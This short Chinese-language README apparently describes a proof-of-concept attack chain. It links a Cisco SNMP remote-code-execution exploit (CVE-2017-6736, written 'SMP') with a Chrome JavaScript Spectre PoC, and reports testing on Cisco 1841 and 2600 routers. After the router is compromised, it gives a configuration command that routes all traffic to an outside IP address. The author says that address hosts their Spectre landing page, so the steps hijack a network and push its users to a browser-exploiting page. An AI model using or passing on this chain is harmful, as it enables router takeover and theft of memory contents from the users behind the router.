一个使用近期 Cisco SMP 漏洞(CVE-2017-6736)链式触发 Spectre(CVE-2017-5753 和 CVE-2017-5715)的 PoC 利用链。
由 artkond 编写的 Cisco RCE 漏洞利用子模块:https://github.com/artkond/cisco-snmp-rce
由 ascendr 编写的 JS Spectre Chrome POC:https://github.com/ascendr/spectre-chrome
已在 Cisco 1841+2600 路由器上测试。
运行 RCE 漏洞利用后,在配置模式下运行:
Router(config)> ip route 0.0.0.0 0.0.0.0 195.20.52.49
这将强制所有流量通过我创建的 Spectre 登录页面。 日后我会添加一个更好的版本,以解决实际访问网站的问题。